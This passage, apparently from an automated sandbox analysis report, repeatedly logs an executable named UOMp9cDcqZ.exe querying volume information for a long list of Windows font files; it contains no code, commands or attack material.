            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF | VolumeInformation
